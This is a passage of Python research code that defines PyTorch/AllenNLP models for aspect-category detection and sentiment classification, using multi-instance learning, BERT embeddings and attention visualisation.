range(self.category_num)] for j in range(self.category_num): c_label = label[i][j].detach().cpu().numpy().tolist() if c_label == 1: visual_attentions_sentiment = [] labels_sentiment = [] sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist()) if sentiment_true_index == -100: continue titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]), str(pred_sentiment[j][i].detach().cpu().numpy()), str(self.polarites))] c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() visual_attentions_sentiment.append(c_attention) labels_sentiment.append(self.categories[j].split('/')[0]) s_distributions = visual_attentions_sentiment_temp[j] for k in range(self.polarity_num): labels_sentiment.append(self.polarites[k]) visual_attentions_sentiment.append(s_distributions[:, k]) titles_sentiment.extend([''] * 3) attention_visualizer.plot_multi_attentions_of_sentence_backup(words, visual_attentions_sentiment, labels_sentiment, titles_sentiment) # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, # attention_labels, titles, # savefig_filepath=savefig_filepath) print() return output def get_metrics(self, reset: bool = False) -> Dict[str, float]: metrics = { 'accuracy': self._accuracy.get_metric(reset), 'category_f1': self._f1.get_metric(reset)['fscore'] } return metrics class AsMil(Model): def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder, categories: list, polarities: list, vocab: Vocabulary, configuration: dict): super().__init__(vocab) self.configuration = configuration self.word_embedder = word_embedder self.position_embedder = position_embedder self.categories = categories self.polarites = polarities self.category_num = len(categories) self.polarity_num = len(polarities) self.category_loss = nn.BCEWithLogitsLoss() self.sentiment_loss = nn.CrossEntropyLoss() self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) word_embedding_dim = word_embedder.get_output_dim() if self.configuration['position']: word_embedding_dim += position_embedder.get_output_dim() self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True) self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim, word_embedding_dim) for _ in range(self.category_num)] lstm_input_size = word_embedding_dim num_layers = 3 self.lstm = torch.nn.LSTM(lstm_input_size, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=num_layers, dropout=0.5) self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] if self.configuration['lstm_layer_category_classifier']: self.lstm_category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.sentiment_fc = nn.Sequential(nn.Linear(word_embedding_dim, word_embedding_dim), nn.ReLU(), nn.Linear(word_embedding_dim, self.polarity_num)) # self.gc1 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) # self.gc2 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) def matrix_mul(self, input, weight, bias=False): feature_list = [] for feature in input: feature = torch.mm(feature, weight) if isinstance(bias, torch.nn.parameter.Parameter): feature = feature + bias.expand(feature.size()[0], bias.size()[1]) feature = torch.tanh(feature).unsqueeze(0) feature_list.append(feature) return torch.cat(feature_list, 0).squeeze() def element_wise_mul(self, input1, input2, return_not_sum_result=False): feature_list = [] for feature_1, feature_2 in zip(input1, input2): feature_2 = feature_2.unsqueeze(1) feature_2 = feature_2.expand_as(feature_1) feature = feature_1 * feature_2 feature = feature.unsqueeze(0) feature_list.append(feature) output = torch.cat(feature_list, 0) result = torch.sum(output, 1) if return_not_sum_result: return result, output else: return result def reduce(self, nodes): """Take an average over all neighbor node features hu and use it to overwrite the original node feature.""" m = nodes.mailbox['m'] accum = torch.sum(m, 1) return {'h': accum} def pad_dgl_graph(self, graphs, max_node_num): graphs_padded = [] for graph in graphs: graph_padded = copy.deepcopy(graph) node_num = graph.number_of_nodes() graph_padded.add_nodes(max_node_num - node_num) graphs_padded.append(graph_padded) return graphs_padded def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor, polarity_mask: torch.Tensor, sample: list) -> torch.Tensor: mask = get_text_field_mask(tokens) word_embeddings = self.word_embedder(tokens) if self.configuration['position']: position_embeddings = self.position_embedder(position) word_embeddings = torch.cat([word_embeddings, position_embeddings], dim=-1) word_embeddings_fc = self.embedding_layer_fc(word_embeddings) embedding_layer_category_outputs = [] embedding_layer_category_alphas = [] embedding_layer_sentiment_outputs = [] embedding_layer_sentiment_alphas = [] for i in range(self.category_num): embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i] alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask) embedding_layer_category_alphas.append(alpha) category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False) embedding_layer_category_outputs.append(category_output) lstm_result, _ = self.lstm(word_embeddings) # lstm_result_with_position = torch.cat([lstm_result, position_embeddings], dim=-1) lstm_layer_category_outputs = [] lstm_layer_sentiment_outputs = [] lstm_layer_words_sentiment_soft = [] # max_len = tokens['tokens'].size()[1] # graphs = [e[3] for e in sample] # graphs_padded = self.pad_dgl_graph(graphs, max_len) # graph_output1 = F.relu(self.gc1(word_embeddings, graphs_padded)) # graph_output2 = F.relu(self.gc2(graph_output1, graphs_padded)) for i in range(self.category_num): alpha = embedding_layer_category_alphas[i] category_output = self.element_wise_mul(lstm_result, alpha, return_not_sum_result=False) lstm_layer_category_outputs.append(category_output) # sentiment # word_representation_for_sentiment = torch.cat([graph_output2, lstm_result], dim=-1) word_representation_for_sentiment = lstm_result sentiment_alpha = embedding_layer_category_alphas[i] if self.configuration['mil']: sentiment_alpha = sentiment_alpha.unsqueeze(1) words_sentiment = self.sentiment_fc(word_representation_for_sentiment) if self.configuration['mil_softmax']: words_sentiment_soft = torch.softmax(words_sentiment, dim=-1) lstm_layer_words_sentiment_soft.append(words_sentiment_soft) else: words_sentiment_soft = words_sentiment lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1)) sentiment_output = torch.matmul(sentiment_alpha, words_sentiment_soft).squeeze(1) # batch_size x 2*hidden_dim lstm_layer_sentiment_outputs.append(sentiment_output) else: sentiment_output = self.element_wise_mul(word_representation_for_sentiment, sentiment_alpha, return_not_sum_result=False) lstm_layer_sentiment_outputs.append(sentiment_output) final_category_outputs = [] final_lstm_category_outputs = [] final_sentiment_outputs = [] for i in range(self.category_num): fc = self.category_fcs[i] category_output = embedding_layer_category_outputs[i] final_category_output = fc(category_output) final_category_outputs.append(final_category_output) if self.configuration['lstm_layer_category_classifier']: fc_lstm = self.lstm_category_fcs[i] lstm_category_output = lstm_layer_category_outputs[i] final_lstm_category_output = fc_lstm(lstm_category_output) final_lstm_category_outputs.append(final_lstm_category_output) sentiment_output = lstm_layer_sentiment_outputs[i] if self.configuration['mil']: final_sentiment_output = sentiment_output else: final_sentiment_output = self.sentiment_fc(sentiment_output) final_sentiment_outputs.append(final_sentiment_output) output = {} if label is not None: category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(self.category_num): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + self.category_num]) polarity_masks.append(polarity_mask[:, i]) loss = 0 for i in range(self.category_num): category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1), category_labels[i]) sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long()) loss += category_temp_loss if not self.configuration['only_acd']: loss += sentiment_temp_loss if self.configuration['lstm_layer_category_classifier']: lstm_category_temp_loss = self.category_loss(final_lstm_category_outputs[i].squeeze(dim=-1), category_labels[i]) loss += lstm_category_temp_loss # sentiment accuracy sentiment_logit = torch.cat(final_sentiment_outputs) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs] category_prob = torch.cat(final_category_outputs_prob).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) output['loss'] = loss # visualize attention pred_category = [torch.sigmoid(e) for e in final_category_outputs] pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs] output['pred_category'] = pred_category output['pred_sentiment'] = pred_sentiment if self.configuration['visualize_attention']: for i in range(len(sample)): words = sample[i][2] attention_labels = [e.split('/')[0] for e in self.categories] # category visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] titles = ['true: %s - pred: %s' % (str(label[i][j].detach().cpu().numpy()), str(pred_category[j][i].detach().cpu().numpy())) for j in range(self.category_num)] attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, attention_labels, titles) # sentiment embedding layer # visual_attentions = [embedding_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer # visual_attentions = [lstm_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] for j in range(self.category_num): c_label = label[i][j].detach().cpu().numpy().tolist() if c_label == 1: visual_attentions_sentiment = [] labels_sentiment = [] sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist()) if sentiment_true_index == -100: continue titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]), str(pred_sentiment[j][i].detach().cpu().numpy()), str(self.polarites))] c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() visual_attentions_sentiment.append(c_attention) labels_sentiment.append(self.categories[j].split('/')[0]) s_distributions = visual_attentions_sentiment_temp[j] for k in range(self.polarity_num): labels_sentiment.append(self.polarites[k]) visual_attentions_sentiment.append(s_distributions[:, k]) titles_sentiment.extend([''] * 3) attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_sentiment, labels_sentiment, titles_sentiment) print() return output def get_metrics(self, reset: bool = False) -> Dict[str, float]: metrics = { 'accuracy': self._accuracy.get_metric(reset), 'category_f1': self._f1.get_metric(reset)['fscore'] } return metrics class AsMilSimultaneouslyBert(TextInAllAspectSentimentOutModel): def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder, categories: list, polarities: list, vocab: Vocabulary, configuration: dict, bert_word_embedder: TextFieldEmbedder=None): super().__init__(vocab) self.configuration = configuration self.word_embedder = word_embedder self.position_embedder = position_embedder self.categories = categories self.polarites = polarities self.category_num = len(categories) self.polarity_num = len(polarities) self.category_loss = nn.BCEWithLogitsLoss() self.sentiment_loss = nn.CrossEntropyLoss() self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) word_embedding_dim = word_embedder.get_output_dim() if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True) elif self.configuration['lstm_or_fc_after_embedding_layer'] == 'bilstm': self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=1) else: self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, word_embedding_dim, batch_first=True, bidirectional=False, num_layers=1) self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim, word_embedding_dim) for _ in range(self.category_num)] self.embedding_layer_aspect_attentions = nn.ModuleList(self.embedding_layer_aspect_attentions) self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.category_fcs = nn.ModuleList(self.category_fcs) if self.configuration['lstm_layer_num_in_bert'] != 0: num_layers = self.configuration['lstm_layer_num_in_bert'] bilstm_hidden_size_in_bert = self.configuration['bilstm_hidden_size_in_bert'] if bilstm_hidden_size_in_bert == 0: bilstm_hidden_size_in_bert = int(word_embedding_dim / 2) self.lstm = torch.nn.LSTM(768, bilstm_hidden_size_in_bert, batch_first=True, bidirectional=True, num_layers=num_layers, dropout=self.configuration['dropout_in_bert']) hidden_size = bilstm_hidden_size_in_bert * 2 else: hidden_size = 768 if self.configuration['only_bert']: self.sentiment_fc = nn.Sequential( # nn.Linear(768, 768), # nn.ReLU(), nn.Linear(768, self.polarity_num)) else: self.sentiment_fc = nn.Sequential( # nn.Linear(hidden_size, hidden_size), # nn.ReLU(), nn.Linear(hidden_size, self.polarity_num)) self.bert_word_embedder = bert_word_embedder self.dropout_after_embedding_layer = nn.Dropout(self.configuration['dropout_in_bert']) def set_bert_word_embedder(self, bert_word_embedder: TextFieldEmbedder=None): self.bert_word_embedder = bert_word_embedder def set_grad_for_acd_parameter(self, requires_grad=True): acd_layers = [] if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': acd_layers.append(self.embedding_layer_fc) else: acd_layers.append(self.embedding_layer_lstm) acd_layers.append(self.embedding_layer_aspect_attentions) acd_layers.append(self.category_fcs) for layer in acd_layers: for name, value in layer.named_parameters(): value.requires_grad = requires_grad def set_grad_for_acsc_parameter(self, requires_grad=True): acsc_layers = [] if self.configuration['lstm_layer_num_in_bert'] != 0: acsc_layers.append(self.lstm) acsc_layers.append(self.sentiment_fc) for layer in acsc_layers: for name, value in layer.named_parameters(): value.requires_grad = requires_grad bert_model = self.bert_word_embedder._token_embedders['bert'].bert_model for param in bert_model.parameters(): param.requires_grad = requires_grad def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor, polarity_mask: torch.Tensor, sample: list, bert: torch.Tensor) -> torch.Tensor: bert_mask = bert['mask'] # bert_word_embeddings = self.bert_word_embedder(bert) token_type_ids = bert['bert-type-ids'] # token_type_ids_size = token_type_ids.size() # for i in range(token_type_ids_size[1]): # print(token_type_ids[0][i]) offsets = bert['bert-offsets'] bert_word_embeddings = self.bert_word_embedder(bert, token_type_ids=token_type_ids, offsets=offsets) mask = get_text_field_mask(tokens) word_embeddings = self.word_embedder(tokens) word_embeddings_size = word_embeddings.size() if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': word_embeddings_fc = self.embedding_layer_fc(word_embeddings) else: word_embeddings_fc, (_, _) = self.embedding_layer_lstm(word_embeddings) embedding_layer_category_outputs = [] embedding_layer_category_alphas = [] embedding_layer_sentiment_outputs = [] embedding_layer_sentiment_alphas = [] bert_clses_of_all_aspect = [] for i in range(self.category_num): embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i] alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask) embedding_layer_category_alphas.append(alpha) category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False) embedding_layer_category_outputs.append(category_output) bert_clses_of_aspect = bert_word_embeddings[:, i, 0, :] bert_clses_of_all_aspect.append(bert_clses_of_aspect) if not self.configuration['only_bert']: bert_word_embeddings_of_aspect = bert_word_embeddings[:, i, :, :] aspect_word_embeddings_from_bert = [] for j in range(len(sample)): aspect_word_embeddings_from_bert_of_one_sample = [] all_word_indices_in_bert = sample[j][6] for k in range(word_embeddings_size[1]): if k in all_word_indices_in_bert: word_indices_in_bert = all_word_indices_in_bert[k] word_bert_embeddings = [] for word_index_in_bert in word_indices_in_bert: word_bert_embedding = bert_word_embeddings_of_aspect[j][word_index_in_bert] word_bert_embeddings.append(word_bert_embedding) if len(word_bert_embeddings) == 0: print() if len(word_bert_embeddings) > 1: word_bert_embeddings_unsqueeze = [torch.unsqueeze(e, dim=0) for e in word_bert_embeddings] word_bert_embeddings_cat = torch.cat(word_bert_embeddings_unsqueeze, dim=0) word_bert_embeddings_sum = torch.sum(word_bert_embeddings_cat, dim=0) word_bert_embeddings_ave = word_bert_embeddings_sum / len(word_bert_embeddings) else: word_bert_embeddings_ave = word_bert_embeddings[0] aspect_word_embeddings_from_bert_of_one_sample.append( torch.unsqueeze(word_bert_embeddings_ave, 0)) else: zero = torch.zeros_like(aspect_word_embeddings_from_bert_of_one_sample[-1]) aspect_word_embeddings_from_bert_of_one_sample.append(zero) aspect_word_embeddings_from_bert_of_one_sample_cat = torch.cat(aspect_word_embeddings_from_bert_of_one_sample, dim=0) aspect_word_embeddings_from_bert.append(torch.unsqueeze(aspect_word_embeddings_from_bert_of_one_sample_cat, dim=0)) aspect_word_embeddings_from_bert_cat = torch.cat(aspect_word_embeddings_from_bert, dim=0) if self.configuration['lstm_layer_num_in_bert'] != 0: aspect_word_embeddings_from_bert_cat, _ = self.lstm(aspect_word_embeddings_from_bert_cat) embedding_layer_sentiment_outputs.append(aspect_word_embeddings_from_bert_cat) lstm_layer_category_outputs = [] lstm_layer_sentiment_outputs = [] lstm_layer_words_sentiment_soft = [] sentiment_output_clses_soft = [] for i in range(self.category_num): sentiment_output_temp = bert_clses_of_all_aspect[i] if self.configuration['dropout_after_cls']: sentiment_output_temp = self.dropout_after_embedding_layer(sentiment_output_temp) sentiment_output_cls = self.sentiment_fc(sentiment_output_temp) sentiment_output_clses_soft.append(torch.softmax(sentiment_output_cls, dim=-1)) if self.configuration['only_bert']: sentiment_output = sentiment_output_cls lstm_layer_sentiment_outputs.append(sentiment_output) else: # sentiment aspect_word_embeddings_from_bert = embedding_layer_sentiment_outputs[i] word_representation_for_sentiment = self.dropout_after_embedding_layer(aspect_word_embeddings_from_bert) sentiment_alpha = embedding_layer_category_alphas[i] if self.configuration['mil']: sentiment_alpha = sentiment_alpha.unsqueeze(1) words_sentiment = self.sentiment_fc(word_representation_for_sentiment) if self.configuration['mil_softmax']: words_sentiment_soft = torch.softmax(words_sentiment, dim=-1) lstm_layer_words_sentiment_soft.append(words_sentiment_soft) else: words_sentiment_soft = words_sentiment lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1)) sentiment_output_mil = torch.matmul(sentiment_alpha, words_sentiment_soft).squeeze(1) # batch_size x 2*hidden_dim if self.configuration['concat_cls_vector']: if self.configuration['concat_cls_vector_mode'] == 'average': sentiment_output = (sentiment_output_mil + sentiment_output_cls) / 2 else: sentiment_output = sentiment_output_mil + sentiment_output_cls else: sentiment_output = sentiment_output_mil lstm_layer_sentiment_outputs.append(sentiment_output) else: sentiment_output_temp = self.element_wise_mul(word_representation_for_sentiment, sentiment_alpha, return_not_sum_result=False) sentiment_output_not_mil = self.sentiment_fc(sentiment_output_temp) if self.configuration['concat_cls_vector']: if self.configuration['concat_cls_vector_mode'] == 'average': sentiment_output = (sentiment_output_not_mil + sentiment_output_cls) / 2 else: sentiment_output = sentiment_output_not_mil + sentiment_output_cls else: sentiment_output = sentiment_output_not_mil lstm_layer_sentiment_outputs.append(sentiment_output) final_category_outputs = [] final_lstm_category_outputs = [] final_sentiment_outputs = [] for i in range(self.category_num): fc = self.category_fcs[i] category_output = embedding_layer_category_outputs[i] final_category_output = fc(category_output) final_category_outputs.append(final_category_output) sentiment_output = lstm_layer_sentiment_outputs[i] final_sentiment_output = sentiment_output final_sentiment_outputs.append(final_sentiment_output) output = {} if label is not None: category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(self.category_num): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + self.category_num]) polarity_masks.append(polarity_mask[:, i]) loss = 0 total_category_loss = 0 total_sentiment_loss = 0 for i in range(self.category_num): category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1), category_labels[i]) sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long()) if not self.configuration['only_sc']: total_category_loss += category_temp_loss if not self.configuration['only_acd']: total_sentiment_loss += sentiment_temp_loss loss = self.category_loss_weight * total_category_loss + self.sentiment_loss_weight * total_sentiment_loss # sentiment accuracy sentiment_logit = torch.cat(final_sentiment_outputs) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs] category_prob = torch.cat(final_category_outputs_prob).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) output['loss'] = loss # visualize attention pred_category = [torch.sigmoid(e) for e in final_category_outputs] pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs] output['pred_category'] = pred_category output['pred_sentiment'] = pred_sentiment output['embedding_layer_category_alphas'] = embedding_layer_category_alphas output['lstm_layer_words_sentiment_soft'] = lstm_layer_words_sentiment_soft if self.configuration['visualize_attention']: for i in range(len(sample)): words: list = sample[i][2] # if not ('while' in words and 'it' in words): # continue attention_labels = [e.split('/')[0] for e in self.categories] # category visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] titles = ['true: %s - pred: %s' % (str(label[i][j].detach().cpu().numpy()), str(pred_category[j][i].detach().cpu().numpy())) for j in range(self.category_num)] # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, # attention_labels, titles, savefig_filepath) attention_visualizer.plot_multi_attentions_of_sentence_backup(words, visual_attentions_category, attention_labels, titles) # sentiment lstm layer visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)] for j in range(self.category_num)] if self.configuration['concat_cls_vector']: words.insert(0, '[CLS]') clses_sentiment_temp = [e.unsqueeze(dim=1)[i] for e in sentiment_output_clses_soft] visual_attentions_sentiment_temp = [torch.cat([visual_attentions_sentiment_temp[j], clses_sentiment_temp[j]], dim=0) for j in range(len(visual_attentions_sentiment_temp))] visual_attentions_sentiment_temp = [e.detach().cpu().numpy() for e in visual_attentions_sentiment_temp] for j in range(self.category_num): c_label = label[i][j].detach().cpu().numpy().tolist() if c_label == 1: visual_attentions_sentiment = [] labels_sentiment = [] sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist()) if sentiment_true_index == -100: continue titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]), str(pred_sentiment[j][i].detach().cpu().numpy()), str(self.polarites))] c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() if self.configuration['concat_cls_vector']: c_attention = np.array([1] + c_attention.tolist()) visual_attentions_sentiment.append(c_attention) labels_sentiment.append(self.categories[j].split('/')[0]) s_distributions = visual_attentions_sentiment_temp[j] for k in range(self.polarity_num): labels_sentiment.append(self.polarites[k]) visual_attentions_sentiment.append(s_distributions[:, k]) titles_sentiment.extend([''] * 3) # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_sentiment, # labels_sentiment, # titles_sentiment, savefig_filepath) attention_visualizer.plot_multi_attentions_of_sentence_backup(words, visual_attentions_sentiment, labels_sentiment, titles_sentiment) return output def get_metrics(self, reset: bool = False) -> Dict[str, float]: metrics = { 'accuracy': self._accuracy.get_metric(reset), 'category_f1': self._f1.get_metric(reset)['fscore'] } return metrics class AsMilSimultaneouslyBertSingle(TextInAllAspectSentimentOutModel): def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder, categories: list, polarities: list, vocab: Vocabulary, configuration: dict, bert_word_embedder: TextFieldEmbedder=None): super().__init__(vocab) self.configuration = configuration self.word_embedder = word_embedder self.position_embedder = position_embedder self.categories = categories self.polarites = polarities self.category_num = len(categories) self.polarity_num = len(polarities) self.category_loss = nn.BCEWithLogitsLoss() self.sentiment_loss = nn.CrossEntropyLoss() self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) word_embedding_dim = word_embedder.get_output_dim() if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True) else: self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, word_embedding_dim, batch_first=True, bidirectional=False, num_layers=1) self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim, word_embedding_dim) for _ in range(self.category_num)] self.embedding_layer_aspect_attentions = nn.ModuleList(self.embedding_layer_aspect_attentions) self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.category_fcs = nn.ModuleList(self.category_fcs) if self.configuration['lstm_layer_num_in_bert'] != 0: num_layers = self.configuration['lstm_layer_num_in_bert'] self.lstm = torch.nn.LSTM(768, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=num_layers, dropout=self.configuration['dropout_in_bert']) hidden_size = word_embedding_dim else: hidden_size = 768 self.sentiment_fc = nn.Sequential(nn.Linear(hidden_size, self.polarity_num)) self.bert_word_embedder = bert_word_embedder self.dropout_after_embedding_layer = nn.Dropout(self.configuration['dropout_in_bert']) def set_grad_for_acd_parameter(self, requires_grad=True): acd_layers = [] if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': acd_layers.append(self.embedding_layer_fc) else: acd_layers.append(self.embedding_layer_lstm) acd_layers.append(self.embedding_layer_aspect_attentions) acd_layers.append(self.category_fcs) for layer in acd_layers: for name, value in layer.named_parameters(): value.requires_grad = requires_grad def set_grad_for_acsc_parameter(self, requires_grad=True): acsc_layers = [] if self.configuration['lstm_layer_num_in_bert'] != 0: acsc_layers.append(self.lstm) acsc_layers.append(self.sentiment_fc) for layer in acsc_layers: for name, value in layer.named_parameters(): value.requires_grad = requires_grad bert_model = self.bert_word_embedder._token_embedders['bert'].bert_model for param in bert_model.parameters(): param.requires_grad = requires_grad def set_bert_word_embedder(self, bert_word_embedder: TextFieldEmbedder=None): self.bert_word_embedder = bert_word_embedder def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor, polarity_mask: torch.Tensor, sample: list, bert: torch.Tensor) -> torch.Tensor: bert_mask = bert['mask'] bert_word_embeddings = self.bert_word_embedder(bert) mask = get_text_field_mask(tokens) word_embeddings = self.word_embedder(tokens) word_embeddings_size = word_embeddings.size() if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': word_embeddings_fc = self.embedding_layer_fc(word_embeddings) else: word_embeddings_fc, (_, _) = self.embedding_layer_lstm(word_embeddings) embedding_layer_category_outputs = [] embedding_layer_category_alphas = [] embedding_layer_sentiment_outputs = [] embedding_layer_sentiment_alphas = [] bert_clses_of_all_aspect = [] for i in range(self.category_num): embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i] alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask) embedding_layer_category_alphas.append(alpha) category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False) embedding_layer_category_outputs.append(category_output) bert_clses_of_aspect = bert_word_embeddings[:, 0, 0, :] bert_clses_of_all_aspect.append(bert_clses_of_aspect) if not self.configuration['only_bert']: bert_word_embeddings_of_aspect = bert_word_embeddings[:, 0, :, :] aspect_word_embeddings_from_bert = [] for j in range(len(sample)): aspect_word_embeddings_from_bert_of_one_sample = [] all_word_indices_in_bert = sample[j][6] for k in range(word_embeddings_size[1]): if k in all_word_indices_in_bert: word_indices_in_bert = all_word_indices_in_bert[k] word_bert_embeddings = [] for word_index_in_bert in word_indices_in_bert: word_bert_embedding = bert_word_embeddings_of_aspect[j][word_index_in_bert] word_bert_embeddings.append(word_bert_embedding) if len(word_bert_embeddings) == 0: print() if len(word_bert_embeddings) > 1: word_bert_embeddings_unsqueeze = [torch.unsqueeze(e, dim=0) for e in word_bert_embeddings] word_bert_embeddings_cat = torch.cat(word_bert_embeddings_unsqueeze, dim=0) word_bert_embeddings_sum = torch.sum(word_bert_embeddings_cat, dim=0) word_bert_embeddings_ave = word_bert_embeddings_sum / len(word_bert_embeddings) else: word_bert_embeddings_ave = word_bert_embeddings[0] aspect_word_embeddings_from_bert_of_one_sample.append( torch.unsqueeze(word_bert_embeddings_ave, 0)) else: zero = torch.zeros_like(aspect_word_embeddings_from_bert_of_one_sample[-1]) aspect_word_embeddings_from_bert_of_one_sample.append(zero) aspect_word_embeddings_from_bert_of_one_sample_cat = torch.cat( aspect_word_embeddings_from_bert_of_one_sample, dim=0) aspect_word_embeddings_from_bert.append( torch.unsqueeze(aspect_word_embeddings_from_bert_of_one_sample_cat, dim=0)) aspect_word_embeddings_from_bert_cat = torch.cat(aspect_word_embeddings_from_bert, dim=0) if self.configuration['lstm_layer_num_in_bert'] != 0: aspect_word_embeddings_from_bert_cat, _ = self.lstm(aspect_word_embeddings_from_bert_cat) embedding_layer_sentiment_outputs.append(aspect_word_embeddings_from_bert_cat) lstm_layer_category_outputs = [] lstm_layer_sentiment_outputs = [] lstm_layer_words_sentiment_soft = [] for i in range(self.category_num): sentiment_output_temp = bert_clses_of_all_aspect[0] sentiment_output_cls = self.sentiment_fc(sentiment_output_temp) if self.configuration['only_bert']: sentiment_output = sentiment_output_cls lstm_layer_sentiment_outputs.append(sentiment_output) else: # sentiment aspect_word_embeddings_from_bert = embedding_layer_sentiment_outputs[0] word_representation_for_sentiment = self.dropout_after_embedding_layer(aspect_word_embeddings_from_bert) sentiment_alpha = embedding_layer_category_alphas[i] if self.configuration['mil']: sentiment_alpha = sentiment_alpha.unsqueeze(1) words_sentiment = self.sentiment_fc(word_representation_for_sentiment) if self.configuration['mil_softmax']: words_sentiment_soft = torch.softmax(words_sentiment, dim=-1) lstm_layer_words_sentiment_soft.append(words_sentiment_soft) else: words_sentiment_soft = words_sentiment 